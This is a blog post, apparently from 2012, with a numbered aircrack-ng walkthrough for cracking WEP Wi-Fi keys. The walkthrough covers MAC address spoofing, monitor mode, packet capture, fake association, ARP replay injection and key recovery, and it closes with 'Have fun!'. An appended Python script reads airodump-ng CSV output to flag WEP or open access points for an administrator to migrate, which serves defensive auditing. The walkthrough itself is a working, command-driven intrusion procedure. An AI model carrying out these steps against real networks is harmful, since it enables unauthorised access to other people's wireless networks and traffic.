Tuesday, 14 August 2012

How to crack WEP with aircrack-ng (Backtrack)

Anybody should be able to do this. If you struggle with something, post a comment and I'll get back to you.

Requirements
- Backtrack (or Linux with aircrack-ng installed)
- Virtual machine (e.g. VMware or VirtualBox)
- USB wifi adapter (you will need a wifi adapter which you can put in promiscuous mode; it won't work with your built-in notebook wifi card, etc.). Buy this one: Alfa AWUS036H. It is cheap, reliable and works out of the box.

Commands
  1. airmon-ng stop wlan0
  2. ifconfig wlan0 down
  3. macchanger -m 00:11:22:33:44:55 wlan0
  4. ifconfig wlan0 up
  5. airmon-ng start wlan0
  6. ifconfig mon0 down
  7. macchanger -r mon0 (assigns a random MAC)
  8. ifconfig mon0 up
  9. airodump-ng mon0 (scan for APs)
  10. Wait for a minute
  11. CTRL + C (stop scanning)
  12. Pick your own AP with WEP encryption
  13. airodump-ng -c (channel) -w (filename) --bssid (xx:xx:xx:xx:xx:xx) mon0
    • -w gives the file in which the captured data will be saved.
  14. You need around 10k data packets to successfully crack WEP.
  15. Open another console
  16. aireplay-ng -1 0 -a (BSSID) -e (ESSID) mon0
  17. Wait for "Association successful"
  18. aireplay-ng -3 -b (BSSID) -e (ESSID) mon0 (starts the injection)
    • the data count in the other console should now increase significantly
  19. Open another console
  20. aircrack-ng (filename.cap)
    • path to the file from step 13, e.g. ~/Desktop/test.cap
  21. Wait for "Key Found"
  22. Enter the key without the ':' separators.
This can be done in approx. 10 minutes. Have fun!
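The scan in steps 9 to 13 also leaves an airodump-ng CSV next to the capture file, which is the handy place for an administrator to check whether any of their own access points are still on WEP. The following script is an added example and not part of the original post: it reads that CSV, flags access points that are WEP or open, and rates WEP ones HIGH once the IV count seen in the capture window reaches the ~10k rule of thumb from step 14, since at that point a passive listener already holds enough to recover the key. The CSV content is constructed, the column layout is assumed from airodump-ng's CSV format, and the threshold is a chosen default.

```python
import csv
import io

# Constructed sample of the access-point section of an airodump-ng CSV
# (a "-w prefix" run writes prefix-01.csv); the header is assumed from
# the tool's CSV layout and every value below is made up for illustration.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2012-08-14 10:00:01, 2012-08-14 10:09:58, 6, 54, WEP, WEP, , -40, 812, 14230, 0.0.0.0, 7, lab-wep, 
66:77:88:99:AA:BB, 2012-08-14 10:00:03, 2012-08-14 10:09:57, 11, 54, WPA2, CCMP, PSK, -55, 790, 0, 0.0.0.0, 9, office-ap, 
CC:DD:EE:FF:00:11, 2012-08-14 10:00:05, 2012-08-14 10:09:50, 1, 11, WEP, WEP, OPN, -70, 300, 95, 0.0.0.0, 5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

WEAK_PRIVACY = {"WEP", "OPN"}  # WEP is broken, OPN means no encryption at all


def parse_access_points(text):
    """Return one dict per AP row; the blank line that precedes the
    station section marks the end of the AP table."""
    aps, header = [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        row = [field.strip() for field in row]
        if not row or row == [""]:
            if header is not None:
                break
            continue
        if header is None:
            header = row
        elif len(row) >= len(header):
            aps.append(dict(zip(header, row)))
    return aps


def audit(aps, iv_alert=10000):
    """List weakly protected APs. A WEP AP whose IV count in this capture
    window already reaches iv_alert (the ~10k rule of thumb) is rated
    HIGH; any other WEP or open AP is rated MEDIUM."""
    findings = []
    for ap in aps:
        privacy = ap["Privacy"].split()[0] if ap["Privacy"] else ""
        if privacy not in WEAK_PRIVACY:
            continue
        ivs = int(ap["# IV"] or 0)
        level = "HIGH" if privacy == "WEP" and ivs >= iv_alert else "MEDIUM"
        findings.append((ap["BSSID"], ap["ESSID"], privacy, ivs, level))
    return findings
```

Point `parse_access_points` at the text of your own prefix-01.csv and any AP that comes back from `audit` is one to migrate off WEP before somebody else runs the steps above against it.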
